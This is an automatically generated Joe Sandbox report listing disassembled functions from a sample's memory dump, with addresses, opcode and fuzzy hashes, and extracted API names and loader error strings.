                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                            • Instruction ID: 06353fc447ed666230f61917eef8c2c0941ef23456a0541e5d388363e7dff3c4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70515336E1975586E7248B2AC0443393BA0EF54B6CF344135CA4E97796DFBAE853C780
                                                                                                                                                                                                                            Function 00007FF6029A0DC4 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                            • Instruction ID: 91ff9aab2afc8c8804874c7fb87a824e8e05fe19e140513a304cd90142b89a54
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21516136E2875186E7648B2AC0443283BA0EF59B6CF344135DE4D97796CFBAE852D7C0
                                                                                                                                                                                                                            Function 00007FF6029A0BC0 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                            • Instruction ID: 545800d92c470b8ee8342e2b45eda9d544b4d8cda007eefa53a9a9e2ff87f584
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C515F36E18B5585E7648B2AC0543282BB0EF49B5CF344131CE4D977A6CFBAE857C780
                                                                                                                                                                                                                            Function 00007FF6029A0FD0 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                            • Instruction ID: e5bbaa7cfb39b76558cf2938e82c84594d7b4558c016e3301ef2dd3cbf1a67e5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD516036E187A186E7248B2AC4452393BA1EF45B5CF344131CA4DA7796CFBAEC42C7C4
                                                                                                                                                                                                                            Function 00007FF6029A07B0 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                            • Instruction ID: 94159724fbd3a1dd8bb9309d89454e934f854662e775e9f5ef36d3b651722d9b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8516E36E1875186E7648B2AD05032D2BA0EF98B5CF345131CA4D977AACF7AE852C7C4
                                                                                                                                                                                                                            Function 00007FF6029A4D90 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                            • Instruction ID: a39003c0427a59b69cb45c301ef3cac935b61dc2cd09b589e9f7a19f78335b41
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0641E352C0978A84EFD5CD6A45006B92E80AF62BADD7873B0DDAD937C3CDCD35968280
                                                                                                                                                                                                                            Function 00007FF6029A8D20 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                                                                                                            • Opcode ID: 61b247ec2cd4a56554382bf708fbc4e01f38c172e17036847b2aeb904ed1f5a4
                                                                                                                                                                                                                            • Instruction ID: 5b6b25e30ae39abc178fdf0d6bca960bbe005cd3a7d62833416b873a4a0d6af5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 61b247ec2cd4a56554382bf708fbc4e01f38c172e17036847b2aeb904ed1f5a4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9411122B14A5482EF44CF2BD9145A967A1FF48FD8B289032EE0DD7B59DE7CD4428340
                                                                                                                                                                                                                            Function 00007FF6029A6F5C Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: b6c301963f4d499762b834649d5019d4f1da61d162ffdfdabe458e9967d829e7
                                                                                                                                                                                                                            • Instruction ID: 8e2f887d376475b22c764f44817a59dd1578fa0cdde2a2d61c56f5d8cc3a5297
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6c301963f4d499762b834649d5019d4f1da61d162ffdfdabe458e9967d829e7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC319732F08B8181EB64DF26644117EBE95AF85B94F244238EA9D93BD7DFBCD1018744
                                                                                                                                                                                                                            Function 00007FF6029B85D0 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 2a1d4c4c62d6ba66f08837a5605787ee27bc815a3f51490fd1d5e432fd47d09b
                                                                                                                                                                                                                            • Instruction ID: 917f269127110a7b3afcd90fada36ccde601c030b41835881f23903544e47aa7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a1d4c4c62d6ba66f08837a5605787ee27bc815a3f51490fd1d5e432fd47d09b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9F068717282958BDB948F6DB5036297BD0FB083C4F909039E58DC3B04DB7C90609F04
                                                                                                                                                                                                                            Function 00007FF60299C37C Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: bf0128cb482711b52506c638c16f4413be21c5de8604638760a4148ddf84eb8f
                                                                                                                                                                                                                            • Instruction ID: b84452150a4c0ee4c3698f9be0d9763e8024eeec3e775961e8ed4bf937edb065
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf0128cb482711b52506c638c16f4413be21c5de8604638760a4148ddf84eb8f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86A0012190C902E4E6498B46A9510202A20FF58319BA00032E00D810A29EADA8108204
                                                                                                                                                                                                                            Function 00007FF602996E40 Relevance: 112.3, APIs: 31, Strings: 33, Instructions: 264libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                                            • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                            • API String ID: 190572456-573889970
                                                                                                                                                                                                                            • Opcode ID: da2a48819edd5d87f038863f33265e6f2153e637403049e828f7f12ef4b7c937
                                                                                                                                                                                                                            • Instruction ID: daa8097969e0aeecd5d4266b5331f11b8e067ceaf159f9b0f296e560310d9139
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da2a48819edd5d87f038863f33265e6f2153e637403049e828f7f12ef4b7c937
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABE1F960D1DB0398FA16CB8BA9141B42BA9AF1975CFB40436C84D92367EFFCF568D240
                                                                                                                                                                                                                            Function 00007FF602997720 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 115COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00007FF602998410: MultiByteToWideChar.KERNEL32(?,?,?,00007FF602993F84,00000000,00007FF602991925), ref: 00007FF602998449
                                                                                                                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(?,00007FF602997BE7,?,?,FFFFFFFF,00007FF602993834), ref: 00007FF60299777C
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029926C0: MessageBoxW.USER32 ref: 00007FF602992736
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                            • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                            • API String ID: 1662231829-930877121
                                                                                                                                                                                                                            • Opcode ID: b1e34cefdcd531fb2e3d85618d8f3015dc0ae29580597214599fb7a6a91ffda1
                                                                                                                                                                                                                            • Instruction ID: 7a6eccc6ea2f4effa9055b7710104c6697e653f69879bd049790bb8444196a5d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b1e34cefdcd531fb2e3d85618d8f3015dc0ae29580597214599fb7a6a91ffda1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E241D351E2C6439AFB51EB6BD9512FA6B50EF8479CF644032DA0EC2697EEECE514C300
                                                                                                                                                                                                                            Function 00007FF6029920F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                            • String ID: P%
                                                                                                                                                                                                                            • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                            • Opcode ID: feab6a593f8e8746b07cf379722ca482350526e77f88b0dc347bc9c905c735f3
                                                                                                                                                                                                                            • Instruction ID: 202efe7618127287b851023a33ab4f795552d859f98d7b1add110bcf26f26c49
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: feab6a593f8e8746b07cf379722ca482350526e77f88b0dc347bc9c905c735f3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68510626618BA186D6349F26E4181BABBA1FB98B65F104131EFCE83785DF7CD085DB10
                                                                                                                                                                                                                            Function 00007FF6029A52F0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 493COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: -$:$f$p$p
                                                                                                                                                                                                                            • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                            • Opcode ID: d5b32d71c33d064cea4f100581863d6417d5572bcca18dbea7b62c7b42b3309f
                                                                                                                                                                                                                            • Instruction ID: 4c1ffc745fbe2f22a30b0de5f25ac9d51ab454988e8d5ed9181b404415dd6404
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d5b32d71c33d064cea4f100581863d6417d5572bcca18dbea7b62c7b42b3309f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C12C761F0C34386FB605B1AD0446797AA1FF80758FE64035E68AC76C6DFBCE9808B90
                                                                                                                                                                                                                            Function 00007FF6029A0038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
